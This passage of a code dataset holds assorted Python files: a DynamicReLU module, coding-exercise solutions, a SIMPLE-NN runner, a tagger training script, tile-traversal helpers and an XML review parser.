reduction, k, conv_type)\n self.fc2 = nn.Linear(channels // reduction, 2*k)\n\n def forward(self, x):\n assert x.shape[1] == self.channels\n theta = self.get_relu_coefs(x)\n\n relu_coefs = theta.view(-1, 2*self.k) * self.lambdas + self.init_v\n # BxCxL -> LxCxBx1\n x_perm = x.transpose(0, -1).unsqueeze(-1)\n output = x_perm * relu_coefs[:, :self.k] + relu_coefs[:, self.k:]\n # LxCxBx2 -> BxCxL\n result = torch.max(output, dim=-1)[0].transpose(0, -1)\n\n return result\n\n\nclass DyReLUB(DyReLU):\n '''\n 更适合对图像分类等任务\n reduction=8 是性能和速度的权衡\n conv_type='2d' 类似SE模块 '1d'适用语音转文字任务 https://github.com/Islanna/DynamicReLU/issues/2\n '''\n def __init__(self, channels, reduction=8, k=2, conv_type='2d'):\n super(DyReLUB, self).__init__(channels, reduction, k, conv_type)\n self.fc2 = nn.Linear(channels // reduction, 2*k*channels) # 超函数的输出为2KC,覆盖父类的fc2值\n\n def forward(self, x):\n assert x.shape[1] == self.channels\n theta = self.get_relu_coefs(x) # 计算ab值的残差\n\n # ab值= λ*残差值 + 初始值\n # [2,64,4]\n relu_coefs = theta.view(-1, self.channels, 2*self.k) * self.lambdas + self.init_v\n\n if self.conv_type == '1d':\n # BxCxL -> LxBxCx1\n x_perm = x.permute(2, 0, 1).unsqueeze(-1)\n output = x_perm * relu_coefs[:, :, :self.k] + relu_coefs[:, :, self.k:]\n # LxBxCx2 -> BxCxL\n result = torch.max(output, dim=-1)[0].permute(1, 2, 0)\n\n elif self.conv_type == '2d':\n # BxCxHxW -> HxWxBxCx1 permute通道交换[2,64,112,112]->[112,112,2,64]\n x_perm = x.permute(2, 3, 0, 1).unsqueeze(-1)\n # 激活函数 y=ax+b\n output = x_perm * relu_coefs[:, :, :self.k] + relu_coefs[:, :, self.k:]\n # HxWxBxCx2 -> BxCxHxW\n # K=2 表示激活函数内有 两个线性函数,激活其中的最大值\n result = torch.max(output, dim=-1)[0].permute(2, 3, 0, 1)\n\n return 
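DyReLUB learns per-channel coefficients, so the channel count passed at construction must match dimension 1 of the input. A smoke test assuming the classes above are in scope:

```python
import torch

m = DyReLUB(channels=64, reduction=8, k=2, conv_type='2d')
x = torch.randn(2, 64, 8, 8)   # (batch, channels, H, W)
y = m(x)
print(y.shape)                 # torch.Size([2, 64, 8, 8]): shape-preserving
```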
result\n","repo_name":"bobo0810/DynamicReLU","sub_path":"dyrelu.py","file_name":"dyrelu.py","file_ext":"py","file_size_in_byte":3977,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"95"} +{"seq_id":"36772243313","text":"'''\n서로 다른 정수 N개가 주어지면 정렬한 상태로 리스트 A에 저장한다. 그런 다음 리스트 B에 저장된 M개의 정수에 대해 A에 들어있는 수인지 이진 탐색을 통해 확인하려고 한다.\n전체 탐색 구간의 시작과 끝 인덱스를 l과 r이라고 하면, 중심 원소의 인덱스 m=(l+r)//2 이고, 이진 탐색의 왼쪽 구간은 l부터 m-1, 오른쪽 구간은 m+1부터 r이 된다.\n이때 B에 속한 어떤 수가 A에 들어있으면서, 동시에 탐색 과정에서 양쪽구간을 번갈아 선택하게 되는 숫자의 개수를 알아보려고 한다.\n다음은 10개의 정수가 저장된 리스트 A에서 이진 탐색으로 6을 찾는 예이다.\n예를 들어 10을 찾는 경우 오른쪽-오른쪽 구간을 선택하므로 조건에 맞지 않는다\n5를 찾는 경우 m에 위치하므로 조건에 맞는다.\n이때 m에 찾는 원소가 있는 경우 방향을 따지지 않는다. M개의 정수 중 조건을 만족하는 정수의 개수를 알아내는 프로그램을 만드시오.\n\n[입력]\n첫 줄에 테스트케이스의 수 T가 주어진다. 1<=T<=50\n다음 줄부터 테스트 케이스의 별로 A와 B에 속한 정수의 개수 N, M이 주어지고, 두 줄에 걸쳐 N개와 M개의 백만 이하의 양의 정수가 주어진다.\n1<=N, M<=500,000\n\n[출력]\n\n각 줄마다 \"#T\" (T는 테스트 케이스 번호)를 출력한 뒤, 답을 출력한다.\n\n입력\n3\n3 3\n1 2 3\n2 3 4\n3 5\n1 3 5\n2 4 6 8 10\n5 5\n1 3 5 7 9\n1 2 3 4 5\n\n출력\n#1 2\n#2 0\n#3 3\n'''\nimport sys\nsys.stdin = open('input.txt')\n\nT = int(input())\n\n\nfor tc in range(1, T+1):\n N, M = map(int, input().split())\n A = list(map(int, input().split()))\n B = list(map(int, input().split()))\n # A를 정렬해야 한다고 했으므로 먼저 정렬\n A.sort()\n # 숫자 갯수를 셀 변수 초기화\n cnt = 0\n # B의 원소들을 확인하��� 위해서 M으로 B의 길이를 설정\n for i in range(M):\n # 초기 left, right 값 설정\n L = 0\n R = N-1\n # target 변수 설정\n tar = B[i]\n # 그전과정을 저장해주는 변수\n history = 0 # 1:left , 2:right\n # L이 R을 넘어갈 때 까지 검사\n while L <= R:\n # 문제조건에 나온대로 중앙값 설정\n mid = (L+R)//2\n # 만약 중앙값하고 같아진다면 찾은것\n if tar == A[mid]:\n cnt += 1\n break\n # 만약 중앙값 보다 클때 오른쪽으로 가야한다.\n elif tar > A[mid]:\n # 하지만 이미 오른쪽으로 온상태라면\n if history == 2:\n # 못찾는케이스\n break\n else:\n # 아니라면 L을 갱신하고\n L = mid + 1\n # 기록하기\n history = 2\n # 그반대로 작은경우에는 왼쪽으로가야함\n elif A[mid] > tar:\n # 하지만 이미 왼쪽으로 온상태라면 종료\n if history == 1:\n break\n else:\n # 아니면 똑같이 해줌\n R = mid - 1\n history = 1\n print(f'#{tc} {cnt}')","repo_name":"Jinga02/Algorithm","sub_path":"soving_club/230329/이진 탐색.py","file_name":"이진 탐색.py","file_ext":"py","file_size_in_byte":3324,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"7293719679","text":"# This program will ask for five numbers and sort them in order of\n# smallest to largest while using the bubble sort algorithm\n# This can also be done by using .sort()\n\ndef main():\n while True:\n print(\"Welcome to the Caesar Cipher Encryptor!\\n\")\n print(\"Give me five numbers, and I'll sort them from smallest to largest!\\n\")\n\n user_input = input(\"Please enter 5 numbers separated by commas: \")\n numbers = [int(num) for num in user_input.split(\",\")] # Convert input to integers\n\n sorted_numbers = bubble_sort(numbers)\n print(f\"Sorted numbers: {sorted_numbers}\")\n\n # Ask if user wants to continue\n another = input(\"Do you want to check another set of numbers? 
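The Baekjoon search above only counts a hit when it never moves in the same direction twice in a row. That condition is easier to test in isolation; a sketch of the core predicate, checked against the second sample case (answer 0):

```python
def found_alternating(arr, target):
    lo, hi, last = 0, len(arr) - 1, 0   # last: 0 = none, 1 = left, 2 = right
    while lo <= hi:
        mid = (lo + hi) // 2
        if arr[mid] == target:
            return True                  # landing on mid ignores direction
        if arr[mid] < target:
            if last == 2:                # two rights in a row: reject
                return False
            lo, last = mid + 1, 2
        else:
            if last == 1:                # two lefts in a row: reject
                return False
            hi, last = mid - 1, 1
    return False

A = sorted([1, 3, 5])
print(sum(found_alternating(A, b) for b in (2, 4, 6, 8, 10)))   # 0
```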
(yes/no): \").lower()\n if another != 'yes':\n break\n\n \ndef bubble_sort(numbers):\n numbers_length = len(numbers)\n \n for i in range(numbers_length - 1):\n flag = 0\n \n for j in range(numbers_length - i - 1):\n if numbers[j] > numbers[j+1]:\n numbers[j], numbers[j+1] = numbers[j+1], numbers[j]\n flag = 1\n \n if flag == 0:\n break\n \n return numbers\n \n\n \n# Call the main function\nmain()\n","repo_name":"ElisaTurner/Sorting-and-Searching","sub_path":"Sorting/BubbleSort.py","file_name":"BubbleSort.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"16663059546","text":"import torch\nimport numpy\nimport sys, os, time\nimport yaml, atexit\nfrom ._version import __version__, __git_sha__\n\nfrom simple_nn.init_inputs import initialize_inputs, check_inputs\nfrom simple_nn.features import preprocess\nfrom simple_nn.models import train\nfrom simple_nn.features.mpi import DummyMPI, MPI4PY\nfrom simple_nn.features.symmetry_function import generate as symf_generator\n\n\ndef run(input_file_name):\n start_time = time.time()\n\n try:\n comm = MPI4PY()\n if comm.size == 1:\n comm = DummyMPI()\n except:\n comm = DummyMPI()\n\n inputs = None\n logfile = None\n if comm.rank == 0:\n logfile = open('LOG', 'w', 1)\n atexit.register(_close_log, logfile)\n inputs = initialize_inputs(input_file_name, logfile)\n\n inputs = comm.bcast(inputs, root=0) \n seed = inputs['random_seed']\n torch.manual_seed(seed)\n numpy.random.seed(seed)\n\n if comm.rank == 0:\n _log_header(inputs, logfile)\n\n if comm.size != 1:\n if inputs['train_model'] is True:\n if comm.rank == 0:\n print(\"MPI4PY does not support in train model. Set train_model: False\")\n comm.barrier()\n raise Exception\n\n errno = 0\n err = None\n if comm.rank == 0:\n errno, err = check_inputs(inputs, logfile)\n check_errno(errno, err, comm)\n\n if inputs['generate_features'] is True:\n generate = get_generate_function(logfile, descriptor_type=inputs['data']['type'])\n generate(inputs, logfile, comm)\n\n if inputs['preprocess'] is True:\n preprocess(inputs, logfile, comm)\n\n if inputs['train_model'] is True:\n train(inputs, logfile, comm)\n\n if comm.rank == 0:\n logfile.write(f\"Total wall time: {time.time()-start_time} s.\\n\")\n\ndef get_generate_function(logfile, descriptor_type='symmetry_function'):\n generator = {\n 'symmetry_function': symf_generator\n }\n\n if descriptor_type not in generator.keys():\n err = \"'{}' type descriptor is not implemented.\".format(descriptor_type)\n raise NotImplementedError(err)\n\n return generator[descriptor_type]\n\ndef _close_log(logfile):\n logfile.flush()\n os.fsync(logfile.fileno())\n logfile.close()\n\ndef _log_header(inputs, logfile):\n # TODO: make the log header (low priority)\n logfile.write(\"SIMPLE_NN v{0:} ({1:})\".format(__version__, __git_sha__))\n logfile.write(\"{:>50}: {:>10}\\n\".format(\"SEED\", inputs[\"random_seed\"]))\n logfile.write(\"{}\\n\".format('-'*88))\n logfile.write(\"{:^88}\\n\".format(\" _____ _ _ _ _ ___ _ _____ __ _ __ _ \"))\n logfile.write(\"{:^88}\\n\".format(\" / ____| | \\ / | '__ \\| | | ___| | \\ | | \\ | |\"))\n logfile.write(\"{:^88}\\n\".format(\"| |___ | | \\ / | |__) | | | |___ ___ | \\ | | \\ | |\"))\n logfile.write(\"{:^88}\\n\".format(\" \\___ \\| | \\/ | ___/| | | ___||___|| |\\ \\| | |\\ \\| |\"))\n logfile.write(\"{:^88}\\n\".format(\" ____| | | |\\ /| | | | |___| |___ | | \\ | | \\ |\"))\n logfile.write(\"{:^88}\\n\".format(\"|_____/|_|_| \\/ |_|_| 
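run() in the SIMPLE-NN record falls back to a serial dummy communicator when mpi4py is missing or only one process is running. The shape of that pattern, with a stand-in class (SIMPLE-NN's own MPI4PY/DummyMPI wrappers carry more methods than this sketch):

```python
class DummyMPI:
    rank, size = 0, 1
    def bcast(self, obj, root=0):
        return obj                       # serial: nothing to broadcast

def get_comm():
    try:
        from mpi4py import MPI           # optional dependency
        comm = MPI.COMM_WORLD
        if comm.Get_size() == 1:         # single process: skip MPI overhead
            return DummyMPI()
        return comm
    except ImportError:
        return DummyMPI()

print(type(get_comm()).__name__)         # DummyMPI when mpi4py is absent
```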
|_____|_____| |_| \\__|_| \\__|\"))\n logfile.write(\"\\n\")\n\ndef write_inputs(inputs):\n \"\"\"\n Write current input parameters to the 'input_cont.yaml' file\n \"\"\"\n with open('input_cont.yaml', 'w') as fil:\n yaml.dump(inputs, fil, default_flow_style=False)\n\ndef check_errno(errno, err, comm):\n errno = comm.bcast(errno)\n err = comm.bcast(err)\n if errno != 0:\n raise Exception(err)\n\n","repo_name":"MDIL-SNU/SIMPLE-NN_v2","sub_path":"simple_nn/simple_nn.py","file_name":"simple_nn.py","file_ext":"py","file_size_in_byte":3480,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"95"} +{"seq_id":"4572330073","text":"from collections import defaultdict\n\nT = int(input())\n\nfor _ in range(T):\n\ts = input()\n\tt = input()\n\t\n\tfor i in range(len(s)):\n\t\tif i == 0:\n\t\t\tcontinue\n\t\tnum = lens - 1 - i\n\t\tif i > 0:\n\t\t\tfor j in range(26):\n\t\t\t\tcheck[num][j] = check[num + 1][j]\n\t\tif check[num][ord(s[num + 1]) - ord('a')] == -1 or check[num][ord(s[num + 1]) - ord('a')] > num:\n\t\t\tcheck[num][ord(s[num + 1]) - ord('a')] = num + 1\n\tinit = check[0].copy()\n\tinit[ord(s[0]) - ord('a')] = 0\n\tresult = 0\n\tlast = 0\n\tfor c in t:\n\t\tnum = ord(c) - ord('a')\n\t\tif result == 0:\n\t\t\tresult = 1\n\t\t\tlast = init[num]\n\t\t\tif last == -1:\n\t\t\t\tresult = -1\n\t\t\t\tbreak\n\t\t\tcontinue\n\t\tlast = check[last][num]\n\t\tif last == -1:\n\t\t\tlast = init[num]\n\t\t\tif last == -1:\n\t\t\t\tresult = -1\n\t\t\t\tbreak\n\t\t\tresult += 1\n\tprint(result)\n\n\n\n\n","repo_name":"Pekaz/problem-solving","sub_path":"codeforces/Educational-Codeforces-Round-81/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"7620842568","text":"import torch\nimport torchvision.transforms as transforms\n# from load3dData import load_data\nfrom dataloading_train import load_training_data\nfrom classification_train import train_loop_class\nfrom dataloading_test import load_testing_data\nfrom classification_test import test_model, calculateAccuracy\n\nif __name__ == '__main__':\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--epochs', default=100, type=int)\n parser.add_argument('--batch_size', default=64, type=int)\n parser.add_argument('--training_data_path', type=str, help=\"Set the path to training dataset\")\n parser.add_argument('--testing_data_path', type=str, help=\"Set the path to testing dataset\")\n parser.add_argument('--testing_data_solution_path', type=str,\n help=\"Set the path to solution of testing dataset (for internal testing\")\n parser.add_argument('--lr', default=0.001, type=float, help=\"Learning rate\")\n parser.add_argument('--train', type=bool, default=False, help=\"Use True for training\")\n parser.add_argument('--test', type=bool, default=False, help=\"Use True for testing\")\n parser.add_argument('--model_path', type=str, help=\"Set the path of the model to be tested\")\n args = parser.parse_args()\n print(args)\n\n if not args.train and not args.test:\n raise TypeError(\n \"Please specify, whether you want to run the training or testing code by setting the parameter --train=True or --test=True\")\n if args.train:\n if not args.training_data_path == None:\n # Preprocess training data. 
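A caveat on the argparse setup above: `type=bool` on --train/--test converts any non-empty string, including "False", to True, so `--train=False` still trains. The rnn-training script further below works around the same pitfall with a str2bool helper; argparse's store_true action is the stock alternative:

```python
import argparse

parser = argparse.ArgumentParser()
parser.add_argument('--train', action='store_true')   # present -> True
parser.add_argument('--test', action='store_true')
args = parser.parse_args(['--train'])
print(args.train, args.test)   # True False

print(bool('False'))           # True: why type=bool misbehaves
```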
When first time called, data is preprocessed and saved to \"my_training_data\".\n # When this folder exists, data is loaded from it directly.\n train_loader, val_loader = load_training_data(args)\n print(\"Number of samples in datasets:\")\n print(\" training: \" + str(len(train_loader.dataset)))\n print(\" validation: \" + str(len(val_loader.dataset)))\n print(\"Shape of data:\")\n print(\" image: \" + str(next(iter(train_loader))[0].shape))\n print(\" target malignancy label: \" + str(next(iter(train_loader))[1].shape))\n # Train model and saves best performing model at model_path.\n model_path = train_loop_class(train_loader, val_loader, args)\n if args.test and not args.testing_data_path == None:\n # Preprocess testing data. When first time called, data is preprocessed and saved to \"my_testing_data\".\n # When this folder exists, data is loaded from it directly.\n test_loader = load_testing_data(args)\n print(\"Number of samples in datasets:\")\n print(\" testing: \" + str(len(test_loader.dataset)))\n args.model_path = model_path\n # Testing data is being predicted and predictions are being saved in folder \"testing_data_prediction_classification\".\n test_model(test_loader, args)\n if not args.testing_data_solution_path == None:\n # Accuracy metric is being calculated between data in folder args.testing_data_solution_path and \"testing_data_prediction_classification\".\n test_acc, test_auc, test_f1s, test_precision, test_recall = calculateAccuracy(args)\n print(\"Testing accuracy: \" + str(test_acc))\n print(\"Testing AUC: \" + str(test_auc))\n print(\"Testing F1: \" + str(test_f1s))\n print(\"Testing Precision: \" + str(test_precision))\n print(\"Testing Recall: \" + str(test_recall))\n else:\n raise TypeError(\n \"Please specify the path to the training data by setting the parameter --training_data_path=\\\"path_to_trainingdata\\\"\")\n elif args.test:\n if args.model_path == None:\n raise TypeError(\"Please specify the path to model by setting the parameter --model_path=\\\"path_to_model\\\"\")\n else:\n if not args.testing_data_path == None:\n # Preprocess testing data. 
When first time called, data is preprocessed and saved to \"my_testing_data\"; this takes a considerably amount of time.\n # When this folder exists, data is loaded from it directly.\n test_loader = load_testing_data(args)\n # Testing data is being predicted and predictions are being saved in folder \"testing_data_prediction_classification\".\n test_model(test_loader, args)\n if not args.testing_data_solution_path == None:\n # Accuracy metric is being calculated between data in folder args.testing_data_solution_path and \"testing_data_prediction_classification\".\n test_acc, test_auc, test_f1s, test_precision, test_recall = calculateAccuracy(args)\n print(\"Testing accuracy: \" + str(test_acc))\n print(\"Testing AUC: \" + str(test_auc))\n print(\"Testing F1: \" + str(test_f1s))\n print(\"Testing Precision: \" + str(test_precision))\n print(\"Testing Recall: \" + str(test_recall))\n else:\n raise TypeError(\n \"Please specify the path to the testing solution/ground truth data by setting the parameter --testing_data_solution_path=\\\"path_to_testingdata_solution\\\"\")\n else:\n raise TypeError(\n \"Please specify the path to the testing data by setting the parameter --testing_data_path=\\\"path_to_testingdata\\\"\")\n","repo_name":"XRad-Ulm/E2MIP_LIDCI-IDRI_classification","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"24109861859","text":"import unittest\nfrom src.utils import process_str\n\n\nclass TestUtilFunctions(unittest.TestCase):\n\n def test_process_str(self):\n text = ' 3.2e-9 '\n processed_text = process_str(text)\n self.assertEqual(processed_text, '3.2e-9')\n\n def test_empty_str(self):\n text = ''\n processed_text = process_str(text)\n self.assertEqual(processed_text, '')","repo_name":"addadda023/real-trump-tweets","sub_path":"tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"5257569837","text":"def altchar(x):\n answer = 0\n poop = []\n i = 0\n g = 1\n for letter in x:\n poop.append(letter)\n while g < len(poop):\n if poop[i] == poop[g]:\n answer = answer + 1\n g = g + 1\n else:\n i = g\n g = g + 1\n return answer\n\n\ninputs = []\nnum = int(input())\nfor i in range(num):\n a = str(input())\n inputs.append(a)\nfor yep in inputs:\n print(altchar(yep))\n","repo_name":"baranmcl/HackerRank_Solutions","sub_path":"Algorithms/Strings/Alternating_Characters/Alternating_Characters.py","file_name":"Alternating_Characters.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"3058847297","text":"from ev_station_assets.assets import GenericBattery, GenericBatteryState\n\n\nbattery_initial_state = GenericBatteryState(\n soc=0.5,\n current_power=0.00\n)\n\nbattery_1 = GenericBattery(\n name=\"battery_1\",\n nameplate_capacity=350.00,\n capacity=350.00,\n inverter_size=150.00,\n current_state=battery_initial_state\n)\n\n","repo_name":"sharabhshukla/ev-station-sim","sub_path":"apps/simulation/ev_charging/station.py","file_name":"station.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"9384484574","text":"from os import makedirs, path as fpath\n\nfrom buildok.action import Action\n\n\nclass 
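The GenericBattery/GenericBatteryState definitions live in ev_station_assets and are not shown; a plausible dataclass-style equivalent of the fields exercised above, purely for illustration (the real classes, and the sign convention for current_power, may differ):

```python
from dataclasses import dataclass

@dataclass
class GenericBatteryState:
    soc: float             # state of charge, assumed 0..1
    current_power: float   # assumed kW

@dataclass
class GenericBattery:
    name: str
    nameplate_capacity: float
    capacity: float
    inverter_size: float
    current_state: GenericBatteryState

b = GenericBattery("battery_1", 350.0, 350.0, 150.0,
                   GenericBatteryState(soc=0.5, current_power=0.0))
print(b.name, b.current_state.soc)
```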
MakeDir(Action):\n r\"\"\"Make a directory or make recursive directories.\n\n Args:\n path (str): Path to directory.\n\n Retuns:\n str: Human readable descriptor message or error.\n\n Raises:\n OSError: If an invalid `path` is provided or if path already exists.\n\n Accepted statements:\n ^create (?:folder|directory) `(?P<path>.+)`$\n ^make new (?:folder|directory) `(?P<path>.+)`$\n\n Sample input:\n - Go to `/tmp`.\n - Create folder `buildok_test_folder`.\n\n Expected:\n Created new directory => buildok_test_folder\n \"\"\"\n\n def run(self, path=None, *args, **kwargs):\n try:\n if not fpath.isdir(path):\n makedirs(path)\n self.success(\"Created new directory => %s\" % path)\n except OSError as e:\n self.fail(str(e))\n\n @classmethod\n def convert_shell(cls, path=None, *args, **kwargs):\n if path is not None:\n return \"mkdir -p %s\" % path\n return \"echo cannot create folder because of invalid path\"\n","repo_name":"lexndru/buildok","sub_path":"buildok/statements/mkdir.py","file_name":"mkdir.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"42054873514","text":"import random\nimport torch\nimport argparse\n\nfrom sys import argv\nfrom classes import tagger as tg\nfrom classes import tools\n\ndef optimize(x, y, optimizer, model, data):\n optimizer.zero_grad()\n output = model(data.words2IDvecs(x))\n loss = torch.nn.CrossEntropyLoss().to(model.device)\n loss_output = loss(output, torch.LongTensor(data.tags2IDs(y)).to(model.device))\n loss_output.backward()\n optimizer.step()\n\ndef dev_evaluate(x, y, model, data, total_tagged, sum_corr):\n total_tagged += len(y)\n output = model(data.words2IDvecs(x))\n sum_corr += sum([1 for ix,iy in zip(output,torch.LongTensor(data.tags2IDs(y))) if torch.argmax(ix).item() == iy.item()])\n accuracy = sum_corr / total_tagged\n return accuracy\n\ndef check_accuracy(accuracy, best_current_accuracy, model):\n if accuracy > best_current_accuracy:\n best_current_accuracy = accuracy\n print(\"\\n====\\nBEST ACCURACY CHANGED : {}\\n====\\n\".format(best_current_accuracy))\n torch.save(model, args.parfile+'.rnn')\n else:\n print('====\\nAccuracy unchanged.\\n====')\n return best_current_accuracy\n \ndef train(data, tagger, numEpochs, optimizer):\n tagger.train()\n if args.gpu:\n tagger.cuda()\n tagger.to(tagger.device)\n best_current_acc = 0.0\n for epoch in range(numEpochs):\n for x, y in data.trainSentences:\n optimize(x, y, optimizer, tagger, data)\n random.shuffle(data.trainSentences)\n total_tagged, sum_corr = 0, 0\n for x, y in data.devSentences:\n accuracy = dev_evaluate(x, y, tagger,data, total_tagged, sum_corr)\n best_current_acc = check_accuracy(accuracy, best_current_acc, tagger)\n\n\nif __name__ == '__main__':\n \n parser = argparse.ArgumentParser(description='Set hyperparams for tagger RNN')\n\n #positional args\n parser.add_argument('trainfile', type=str , help='set training data')\n parser.add_argument('devfile', type=str, help='set development data')\n parser.add_argument('parfile', type=str, help='set file to load/dump data attributes. Needs suffix')\n\n #optional args\n parser.add_argument('--num_epochs', type=int, help='set the number of epochs of the training')\n parser.add_argument('--emb_size', type=int, help='set the number of dimensions of the embedding matrix. This will impact the training speed, but also affects quality')\n parser.add_argument('--rnn_size', type=int, help='set the number of dimensions of the LSTM vector. 
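The isdir-then-makedirs sequence above has a small race window: another process can create the directory between the check and the call, turning success into an OSError. Since Python 3.2, exist_ok folds the check into the call itself:

```python
import os, tempfile

path = os.path.join(tempfile.gettempdir(), "buildok_test_folder")
os.makedirs(path, exist_ok=True)   # no error if it already exists; still
                                   # raises if a non-directory occupies path
print(os.path.isdir(path))         # True
```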
This will impact the training speed, but also affects quality')\n parser.add_argument('--dropout_rate', type=float, help='set the dropout rate')\n parser.add_argument('--learning_rate', type=float, help='set the learning rate of the optimizer')\n parser.add_argument('--gpu', type=tools.str2bool, nargs='?', const=True, default=False, help='set True if cuda-able GPU is available. Else set False')\n\n args = parser.parse_args()\n \n print('Initisalizing training...\\n\\n Parameters:\\n')\n print(' EMBSIZE : {}\\n RNNSIZE : {}\\n NUMEPOCHS :{}\\n DO_RATE :{}\\n L_RATE : {}\\n CUDA : {}\\n\\n'.format(args.emb_size, args.rnn_size, args.num_epochs, args.dropout_rate, args.learning_rate, args.gpu))\n\n dataset = tg.Data(args.trainfile, args.devfile)\n save_dataset = input('Do you want to save the dataset yes <y>, no <n> ?')\n if save_dataset == 'y':\n dataset.store_parameters(args.parfile)\n tagger = tg.TaggerModel(len(dataset.char_id)+1, dataset.numTags, args.emb_size, args.rnn_size, args.dropout_rate, args.gpu)\n print('training...')\n train(dataset, tagger, args.num_epochs, torch.optim.Adam(tagger.parameters(), lr=args.learning_rate))","repo_name":"amonsoes/neural-word-tagger","sub_path":"rnn-training.py","file_name":"rnn-training.py","file_ext":"py","file_size_in_byte":3645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"16827571955","text":"from typing import Optional\n\nfrom tile_tools.common.types import Tile\n\n# Maximum zoom level used by Mapbox.\nMAX_ZOOM = 28\n# Minimum zoom level used by Mapbox.\nMIN_ZOOM = 0\n\n\ndef get_children(tile: Tile, zmax: Optional[int] = MAX_ZOOM) -> list[Tile]:\n \"\"\"Get the four tiles at one higher zoom level.\n\n Args:\n tile - Current tile as (x, y, z) tuple\n zmax - Maximum zoom level. Use `0` or `None` to disable.\n\n Returns:\n Four tiles at the next highest zoom level. Note that in practice, since\n zoom levels are finite, if the next highest zoom level exceeds `zmax`,\n an empty list will be returned (i.e., the tile has no children). This\n behavior can be disabled by passing `0` or `None` for `zmax`.\n \"\"\"\n x0, y0, z0 = tile\n z1 = z0 + 1\n\n # Check zoom bounds\n if zmax and z1 > zmax:\n return []\n\n x1 = 2 * x0\n y1 = 2 * y0\n\n return [\n (x1, y1, z1),\n (x1 + 1, y1, z1),\n (x1 + 1, y1 + 1, z1),\n (x1, y1 + 1, z1),\n ]\n\n\ndef get_parent(tile: Tile, zmin: Optional[int] = MIN_ZOOM) -> Tile:\n \"\"\"Get the tile at one coarser zoom level as the current one.\n\n Args:\n tile - Current tile as (x, y, z) tuple\n zmin - Minimum zoom level. Use `None` to disable.\n\n Returns:\n The parent tile as (x, y, z). If the new zoom would go below `zmin`,\n the null tile (0, 0, 0) is returned. Mathematically the (x, y) coords\n would go here regardless, but `z` will be not be decremented below\n the value of `zmin`. Use `None` if you'd like to arbitrarily decrement\n `z` to negative numbers in the parent.\n \"\"\"\n x0, y0, z0 = tile\n z1 = z0 - 1\n if zmin is not None and z1 < zmin:\n return (0, 0, 0)\n\n x1 = x0 >> 1\n y1 = y0 >> 1\n return (x1, y1, z1)\n\n\ndef get_siblings(tile: Tile) -> list[Tile]:\n \"\"\"Get all adjacent tiles to this one.\n\n Note the behavior differs slightly from @mapbox/tilebelt, which will return\n the current tile in the siblings list.\n\n Args:\n tile - Current tile as (x, y, z) tuple\n\n Returns:\n List of adjacent tiles\n \"\"\"\n # TODO: this could be optimized. 
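One subtlety in train() above: total_tagged and sum_corr are plain ints, so dev_evaluate receives copies and the outer counters never grow; the accuracy kept after the loop effectively covers the last sentence alone. A corrected sketch that accumulates across the whole dev set, assuming the same Data/TaggerModel interfaces used above:

```python
def dev_accuracy(model, data, dev_sentences):
    correct = total = 0
    for x, y in dev_sentences:
        output = model(data.words2IDvecs(x))   # (seq_len, num_tags)
        gold = data.tags2IDs(y)
        preds = output.argmax(dim=-1).tolist()
        correct += sum(p == g for p, g in zip(preds, gold))
        total += len(gold)
    return correct / total if total else 0.0
```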
We just copied the shortcut used by the\n # original authors in @mapbox/tilebelt, and added the filter on the\n # original tile.\n all_parent_children = get_children(get_parent(tile, zmin=None), zmax=None)\n return [child for child in all_parent_children if tile != child]\n\n\ndef has_siblings(tile: Tile, siblings: list[Tile]) -> bool:\n \"\"\"Test if a given `tile`'s siblings match given `siblings`.\n\n The tile itself can optionally be omitted from the siblings list and the\n test will still return True.\n\n Args:\n tile - Current tile as (x, y, z) tuple\n siblings - Set of three or four siblings to test\n\n Returns:\n True if `tile` is adjacent to every member of `siblings`.\n \"\"\"\n # Optimized path for invalid inputs\n if len(siblings) < 3:\n return False\n\n real_sibs = set(get_siblings(tile))\n # Don't consider tile itself in this test.\n cand_sibs = {s for s in siblings if s != tile}\n # NOTE: The logic in the original implementation is a little odd. It will\n # return true as long as the real siblings are a subset of the input.\n return real_sibs.issubset(cand_sibs)\n","repo_name":"biglocalnews/tile-tools","sub_path":"tile_tools/tilebelt/traverse.py","file_name":"traverse.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"31935343550","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jun 03 14:32:32 2015\r\n\r\n@author: slcf\r\n\"\"\"\r\n\r\n#from xml.etree.ElementTree import parse\r\n#import xml.etree.ElementTree\r\nimport xml.etree.ElementTree as ET\r\nimport pickle\r\n\r\n## f.readlines()\r\ncategory = 'kitchen/'\r\nf = open(\"C:/Users/Woojin/Documents/GitHub/DomainAdaptation/Data/original amazon/electronics/all_new.review\",\"rb\")\r\n\r\n## exception \r\n#try:%\r\ntree = ET.parse(f)\r\n#except xml.etree.ElementTree.ParseError as e:\r\n# print e\r\n# a = str(e)\r\n# r1 = a[5] \r\n \r\nf.close()\r\nnote = tree.getroot()\r\n\r\nrev_data = [];\r\nrev_tx_rating = [];\r\n\r\nfor rev_xml in note.getiterator(\"review\"):\r\n rev_data.append(rev_xml.findtext(\"review_text\"))\r\n 